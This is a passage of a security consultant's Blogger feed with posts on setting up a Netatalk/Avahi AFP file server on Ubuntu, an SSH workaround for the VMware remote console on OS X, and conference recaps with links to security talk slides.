class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-2774613989635618731?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/2774613989635618731/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=2774613989635618731&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2774613989635618731'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/2774613989635618731'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/teaching-now.html' title='&quot;Training&quot; Now'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6187265381413608190</id><published>2009-10-17T21:25:00.000-07:00</published><updated>2010-06-13T19:51:10.805-07:00</updated><title type='text'>Unbuntu 9.04 AFP Server</title><content type='html'>&lt;a href="http://2.bp.blogspot.com/_Z4u4MkgQQuE/StqiAXZgxEI/AAAAAAAAAEY/QmOs6xJuf0Q/s1600-h/apple_logo.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5393801630894310466" src="http://2.bp.blogspot.com/_Z4u4MkgQQuE/StqiAXZgxEI/AAAAAAAAAEY/QmOs6xJuf0Q/s320/apple_logo.jpg" style="cursor: pointer; float: left; height: 119px; margin: 0pt 10px 10px 0pt; width: 107px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div face="verdana"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div face="verdana" style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Got a Mac?  I do...a new shiny one.&lt;/span&gt; &lt;/div&gt;&lt;div face="verdana" style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Got a Linux server that you use as a file server on your network? Sick of problems with SAMBA (or even like SAMBA in the first place)? So was I, until today when I decided to figure out how to setup Apple Filing Protocol (AFP) and Bonjour under Linux, Ubuntu 9.04 in my case. In the following tutorial, we’re going to install and configure, Netatalk and Avahi.&lt;/span&gt; &lt;/div&gt;&lt;h4 style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Building Netatalk&lt;/span&gt;&lt;/h4&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Netatalk is the Open Source implementation of AFP. Since Mac OS X requires encryption to work properly, and the standard netatalk package doesn’t include this feature. So we are going to build our own netatalk package from source with encryption enabled. To start, we’re going to download install dependencies for netatalk. Then ensure we install the dependencies for encryption support, and finally grab the source for netatalk.&lt;/span&gt;&lt;/div&gt;&lt;pre style="font-family: Verdana,sans-serif;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo apt-get build-dep netatalk&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo apt-get install cracklib2-dev fakeroot libssl-dev&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo apt-get source netatalk&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Now that we have source we can move into the netatalk directory and start building the package with encryption enabled:&lt;/span&gt;&lt;/div&gt;&lt;pre style="font-family: Verdana,sans-serif;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;cd netatalk-2*&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo DEB_BUILD_OPTIONS=ssl dpkg-buildpackage -rfakeroot&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;This will take a few minutes… Go grab yourself a tasty beverage.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Once completed, hopefully without errors (the ones about being unable to sign the package are OK) you should have a netatalk-2..something.deb package in your home directory. To install it, issue the following command.&lt;/span&gt;&lt;/div&gt;&lt;pre style="color: #660000; font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;sudo dpkg -i ~/netatalk_2*.deb&lt;/span&gt;&lt;/pre&gt;&lt;h4 style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Configure Netatalk&lt;/span&gt;&lt;/h4&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The first thing we are going to do, is disable some services provided by netatalk which are not needed for just file sharing. This will speed up the startup and response time of netatalk significantly. In the following examples I’ll be using nano, but feel free to fire up your favorite text editor.&lt;/span&gt;&lt;/div&gt;&lt;pre style="font-family: Verdana,sans-serif;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo nano /etc/default/netatalk&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Locate the following startup options and change them as noted below. If you’re also interested in sharing a Linux connected printer, enable the pap daemon as well.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif; padding: 0pt 0pt 20px 25px;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;ATALKD_RUN=no&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt; PAPD_RUN=no&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt; CNID_METAD_RUN=yes&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt; AFPD_RUN=yes&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt; TIMELORD_RUN=no&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt; A2BOOT_RUN=no &lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The cnid_meta daemon service handles all the metadata for us which would get lost since your Linux server isn’t formatted as Apple’s HFS+. Go ahead and save an exit this file, and lets move on to the afpd.conf file.&lt;/span&gt;&lt;/div&gt;&lt;pre style="color: #660000; font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;sudo nano /etc/netatalk/afpd.conf&lt;/span&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;At the very bottom of the file you should see a line similar to the following line. Replace it with the following, save and exit.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif; padding: 0pt 0pt 20px 25px;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;- -transall -uamlist uams_randnum.so,uams_dhx.so -nosavepassword -advertise_ssh &lt;/span&gt;&lt;/div&gt;&lt;h4 style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Configuring shared volumes&lt;/span&gt;&lt;/h4&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The next step is telling afpd what volumes we want to share. This is configured in the /etc/netatalk/AppleVolumes.default file.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Scroll to the bottom of the document and define your shared volumes. There should already be a line starting with ~/ allowing the sharing of home directories via AFP. &lt;/span&gt;&lt;/div&gt;&lt;pre style="color: #660000; font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;~/ "$u" cnidscheme:cdb&lt;/span&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;You can setup as many shared volumes as you wish. You can even define which users are allowed to access each share. You do this using the allow option. On my server, I have the following setup for my work folder.&lt;/span&gt;&lt;/div&gt;&lt;pre style="color: #660000; font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;/server/work work allow:igs-awilliams,igs-lwhite&lt;/span&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Once you’re done setting up your shared volumes, restart netatalk using the init.d script.&lt;/span&gt;&lt;/div&gt;&lt;pre style="color: #660000; font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;sudo /etc/init.d/netatalk restart&lt;/span&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Even so we have a fully configured AFP it will not show up in the Finder sidebar on OS X, it is however reachable via ‘Go -&amp;gt; Connect to Server’ in Finder). OS X use a service called Bonjour for automagic discovery, which displays the server on your sidebar. Linux can emulate this functionality with an open source implementation of Bonjour called Avahi.&lt;/span&gt;&lt;/div&gt;&lt;h4 style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Installing Avahi&lt;/span&gt;&lt;/h4&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Avahi is the daemon that will advertise all defined services across your network just like Bonjour does. We are going to install the avahi daemon and the mDNS library used for imitating the Bonjour service. When fully configured this will allow machines running OS X in your network to discover your Linux server automatically.&lt;/span&gt;&lt;/div&gt;&lt;pre style="font-family: Verdana,sans-serif;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo apt-get install avahi-daemon&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #660000; font-size: small;"&gt;sudo apt-get install libnss-mdns&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Our configuration starts with the /etc/nsswitch.conf file. Simply add “mdns” to the end of the line that starts with “hosts:” – when completed it should look something like this.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif; padding: 0pt 0pt 20px 25px;"&gt;&lt;span style="color: #660000; font-size: small;"&gt;hosts: files mdns4_minimal [NOTFOUND=return] dns mdns4 mdns&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Now we have to tell Avahi which services it should advertise across the network, in our case we just want to advertise AFP volumes. This is done by creating a XML file for each service in the /etc/avahi/services/ directory. Create the file /etc/avahi/services/afpd.service and insert the following XML code.&lt;/span&gt;&lt;/div&gt;&lt;div class="codecolorer-container xml default" style="color: #660000; font-family: Verdana,sans-serif; overflow: auto; white-space: nowrap; width: 100%;"&gt;&lt;div class="xml codecolorer" style="white-space: nowrap;"&gt;&lt;div class="codecolorer-container xml default" style="overflow: auto; white-space: nowrap; width: 100%;"&gt;&lt;div class="xml codecolorer" style="white-space: nowrap;"&gt;&lt;blockquote&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;service-group&gt;&lt;br /&gt;&lt;name wildcards="yes"&gt;%h&lt;/name&gt;&lt;br /&gt;&lt;service&gt;&lt;br /&gt;&lt;type&gt;_afpovertcp._tcp&lt;/type&gt;&lt;br /&gt;&lt;port&gt;548&lt;/port&gt;&lt;br /&gt;&lt;/service&gt;&lt;br /&gt;&lt;service&gt;&lt;br /&gt;&lt;type&gt;_device-info._tcp&lt;/type&gt;&lt;br /&gt;&lt;port&gt;0&lt;/port&gt;&lt;br /&gt;&lt;txt-record&gt;model=Xserve&lt;/txt-record&gt;&lt;br /&gt;&lt;/service&gt;&lt;br /&gt;&lt;/service-group&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The only thing left to do is restart Avahi. &lt;/span&gt;&lt;/div&gt;&lt;pre style="color: #660000; font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;sudo /etc/init.d/avahi-daemon restart&lt;/span&gt;&lt;/pre&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;That's it, you have configured the Avahi daemon to advertise AFP sharing across your network which should cause any computer running OS X to automagically discover it. Within a few moments it should show up in your Finder’s sidebar. You should be able to connect using the username and password from your Linux server. Once connected you should see the Volumes we defined in the AppleVolumes.default file.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail!&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6187265381413608190?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6187265381413608190/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6187265381413608190&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6187265381413608190'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6187265381413608190'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2009/10/unbuntu-904-afp-server.html' title='Unbuntu 9.04 AFP Server'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Z4u4MkgQQuE/StqiAXZgxEI/AAAAAAAAAEY/QmOs6xJuf0Q/s72-c/apple_logo.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-3198526035055034379</id><published>2009-10-16T22:07:00.000-07:00</published><updated>2010-06-13T19:51:52.650-07:00</updated><title type='text'>VMWare Server 2.x Remote Console Add-on using OS X</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Well...it turns out that in Firefox (my browser of choice across platforms) this particular plugin will not function correctly on my shiny new Macbook Pro.  Word on the street is that VMWare is working on a native OS X client.  That's all well and good but doesn't allow me to get work done right now (I could use Windows or Linux but I love my shiny new Macbook Pro so).  The perscribed workaround is the following piece of SSH magic:&lt;br /&gt;&lt;br /&gt;ssh -X -f -q  user@REMOTEIP /home/user/.mozilla/firefox/xxxxxxxx.default/extensions/VMwareVMRC@vmware.com/plugins/vmware-vmrc -h REMOTEIP:PORT&lt;br /&gt;&lt;br /&gt;Where user is the user account in question on the remote Linux VMWare server, REMOTEIP is the IP address of the remote Linux VMWare server, xxxxxxxx is the mozilla profile name and PORT is the remote port the VMWare service is running on (8333 by default)&lt;br /&gt;&lt;br /&gt;Prerequisites:&lt;br /&gt;&lt;br /&gt;X11 is running on your OS X platform&lt;br /&gt;The VMWare server Remote Console Add-on is installed on your remote VMWare Linux server&lt;br /&gt;&lt;br /&gt;Is it pretty...hell no.&lt;br /&gt;Does it work...yep.&lt;br /&gt;Will I write a shell script to make my life easier...stay tuned and find out!&lt;br /&gt;&lt;br /&gt;May Your Skill Prevail&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-3198526035055034379?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/3198526035055034379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=3198526035055034379&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3198526035055034379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3198526035055034379'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2009/10/vmware-server-2x-remote-console-add-on.html' title='VMWare Server 2.x Remote Console Add-on using OS X'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1303282120128796528</id><published>2008-05-04T14:56:00.000-07:00</published><updated>2010-06-13T19:52:16.501-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Black Hat USA 2008'/><category scheme='http://www.blogger.com/atom/ns#' term='DefCon 16'/><category scheme='http://www.blogger.com/atom/ns#' term='ISSA Journal'/><category scheme='http://www.blogger.com/atom/ns#' term='Russ McRee'/><category scheme='http://www.blogger.com/atom/ns#' term='security assessments'/><category scheme='http://www.blogger.com/atom/ns#' term='Hackin9'/><category scheme='http://www.blogger.com/atom/ns#' term='The Last HOPE'/><title type='text'>Back on Track</title><content type='html'>&lt;span style="font-family: verdana;"&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;We have been very busy as of late.  Security Assessments, ISSA Regional Conference (Great presentation by Russ McRee by the way!), writing various articles for Hackin9, 2 submissions for Black Hat USA 2008 and Decfon 16 and general business administration.  If all goes well I should have my itinerary for The Last HOPE in NYC July 18th - 20th (Thanks MAF!).&lt;br /&gt;&lt;br /&gt;If anyone is planning on attending The Last HOPE, Black Hat USA 2008 and/or DefCon 16 please contact me if you are interested in meeting up, having a drink, talking tech/business, etc.&lt;/span&gt; &lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1303282120128796528?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1303282120128796528/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1303282120128796528&amp;isPopup=true' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1303282120128796528'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1303282120128796528'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/05/back-on-track.html' title='Back on Track'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-5985076556301521643</id><published>2008-02-27T06:05:00.000-08:00</published><updated>2010-06-13T19:52:48.364-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Paraben'/><category scheme='http://www.blogger.com/atom/ns#' term='Burger King'/><category scheme='http://www.blogger.com/atom/ns#' term='Brian Wilson'/><category scheme='http://www.blogger.com/atom/ns#' term='Chris Gates'/><category scheme='http://www.blogger.com/atom/ns#' term='Sunbelt'/><category scheme='http://www.blogger.com/atom/ns#' term='Starbucks'/><category scheme='http://www.blogger.com/atom/ns#' term='SAINT'/><category scheme='http://www.blogger.com/atom/ns#' term='Blackhat DC 2008'/><category scheme='http://www.blogger.com/atom/ns#' term='Steve Adegbite'/><title type='text'>Blackhat 2 Day Recap [Bettalatethaneva]</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VurlZeaFI/AAAAAAAAAC8/hMyUuYYvr-s/s1600-h/copyrighthead.gif" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="" border="0" id="BLOGGER_PHOTO_ID_5171661442157275218" src="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VurlZeaFI/AAAAAAAAAC8/hMyUuYYvr-s/s200/copyrighthead.gif" style="cursor: pointer; float: left; margin: 0pt 10px 10px 0pt;" /&gt;&lt;/a&gt;&lt;span style="font-family: verdana;"&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;It was another cold, long drive into Washington DC from Aberdeen, MD.  The hour and a half commute was definitely wearing on us.  We had to leave Joe's house by 6:15am to get to the 8am registration on time.  Something had to give...it was as if Law could read my mind.  He looked at me, "Hey Ant, we have to have a Starbuck's coffee on the way in today."  "Your right", I mused.  He punched STARBUCKS into the Garmin GPS in Joe's car without waiting for affirmation from me. "Eight miles" the cold electronic voice said.  "DAMN" was the response in unison.  We went ahead and hit the nearest highway on our way to DC and lo and behold...a sign for Starbucks at the next truck stop 1.5 miles up the highway.  It had to be done, bless Joe's heart but he had violated our Seattle coffee sensibilities when we asked him to stop for coffee earlier in the week and he stopped at Burger King.  Yes my dear readers, Burger King.   Being a Seattle native born and bred I can only do that once a lifetime.&lt;br /&gt;&lt;br /&gt;After walking out of Starbucks cup in hand, there was a look in each mans eye, a pep in his step, for lack of better terms we had &lt;/span&gt; &lt;span style="font-family: Verdana,sans-serif; font-size: small; font-style: italic;"&gt;ENERGY&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;!  On to the Blackhat Tales.&lt;br /&gt;&lt;/span&gt;  &lt;span style="font-family: Verdana,sans-serif; font-size: small; font-weight: bold;"&gt;Day One&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;We registered, claimed our badges and bags and immediately went schwag hunt...er I mean talked to some of the vendors including Paraben, SAINT and Sunbelt Software.  We missed most of the introduction and most of the keynote address.  We also bumped into Chris Gates from LSO and Brian Wilson and hung out with them most of the day including lunch.&lt;br /&gt;&lt;br /&gt;We attended the following talks:&lt;br /&gt;&lt;br /&gt;Cracking GSM&lt;br /&gt;&lt;br /&gt;RFIDI0ts!!!--Practical RFID Hacking&lt;br /&gt;&lt;br /&gt;Bad Sushi: Beating Phishers at their Own Game&lt;br /&gt;&lt;br /&gt;Oracle Hacking&lt;br /&gt;&lt;br /&gt;Scanning Applications 2.0&lt;br /&gt;&lt;br /&gt;We grabbed a quick bite to eat and chatted with Steve Adegbite of Microsoft (always a pleasure!) before we had to leave to do the 1.5 hour commute (sigh)&lt;br /&gt;&lt;/span&gt;          &lt;span style="font-family: Verdana,sans-serif; font-size: small; font-weight: bold;"&gt;Day Two&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;&lt;br /&gt;&lt;br /&gt;We slept in till noon and decided that a 1.5 hour commute both ways just wasn't going to happen.  Instead we packed our suitcases and jumpbags, went bar hopping, shopped at WalMart, and had dinner at a Chinese Buffet.  (not necessarily in that order)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;All in all it was pretty cool, the talks were a step up from Shmoocon overall and the atmosphere is nice (they also have Starbucks drip coffee going for them).  Its much smaller than BH USA Las Vegas which was a great time last year.  I think that next year I might just do Shmoo and then Defcon/BH Vegas in the summer.&lt;/span&gt;   &lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-5985076556301521643?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/5985076556301521643/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=5985076556301521643&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5985076556301521643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/5985076556301521643'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/blackhat-2-day-recap-bettalatethaneva.html' title='Blackhat 2 Day Recap [Bettalatethaneva]'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VurlZeaFI/AAAAAAAAAC8/hMyUuYYvr-s/s72-c/copyrighthead.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-4267804345485683773</id><published>2008-02-26T20:26:00.001-08:00</published><updated>2008-12-11T01:34:27.084-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Joshua Wright'/><category scheme='http://www.blogger.com/atom/ns#' term='Shmoocon'/><category scheme='http://www.blogger.com/atom/ns#' term='PEAP'/><category scheme='http://www.blogger.com/atom/ns#' term='802.11'/><category scheme='http://www.blogger.com/atom/ns#' term='Brad Antoniewicz'/><title type='text'>802.11 Attacks</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Z4u4MkgQQuE/R8VlnVZeZ_I/AAAAAAAAACM/r3bV-kg4KK4/s1600-h/ieee802-11-logo.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_Z4u4MkgQQuE/R8VlnVZeZ_I/AAAAAAAAACM/r3bV-kg4KK4/s200/ieee802-11-logo.jpg" alt="" id="BLOGGER_PHOTO_ID_5171651473538181106" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;I regret that I was unable to see Joshua Wright and Brad Antoniewicz talk on PEAP: Pwned Extensible Authentication Protocol at Shmoocon 4.  Josh was kind enough to put up slide of the talk on &lt;a href="http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_Wright_Antoniewicz.pdf"&gt;willhackforsushi.com&lt;/a&gt;.  Brad also made &lt;a href="http://packetstormsecurity.org/papers/attack/802.11Attacks.pdf"&gt;slides available&lt;/a&gt; that are complimentary to the ones from the presentation.&lt;br /&gt;&lt;br /&gt;In conjunction this is a very informative compilation of slides that should interest anyone interested in 802.11 security and I would like to thank the both of them for making these resources available!&lt;br /&gt;&lt;br /&gt;UPDATE: A related article can be found &lt;a href="http://www.channelregister.co.uk/2008/02/26/wpa_enterprise_pwnage/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-4267804345485683773?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/4267804345485683773/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=4267804345485683773&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/4267804345485683773'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/4267804345485683773'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/80211-attacks.html' title='802.11 Attacks'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Z4u4MkgQQuE/R8VlnVZeZ_I/AAAAAAAAACM/r3bV-kg4KK4/s72-c/ieee802-11-logo.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8186755451384050205</id><published>2008-02-26T03:39:00.000-08:00</published><updated>2008-02-26T03:45:50.627-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OWASP'/><category scheme='http://www.blogger.com/atom/ns#' term='Kurt Grutzmacher'/><title type='text'>Your Client Side Security Sucks [really, it does]</title><content type='html'>&lt;span style="font-family: verdana;"&gt;I returned to Seattle from Shmoocon/BH DC last Friday and have been experiencing a serious case of jet lag.  To get through the fatigue I have been spending time getting caught up on the 266 RSS feeds that I follow via Google Reader and came across the following &lt;a href="http://grutz.jingojango.net/presentations/Your%20Client%20Security%20Sucks%20-%20OWASP.pdf"&gt;OWASP presentation&lt;/a&gt; by Kurt Grutzmacher.&lt;br /&gt;&lt;br /&gt;This is an excellent read that I would suggest to anyone trying to understand why client side security is so vulnerable and error prone on the development side of things.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8186755451384050205?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8186755451384050205/comments/default' title='Post Comments'/><link rel='replies' 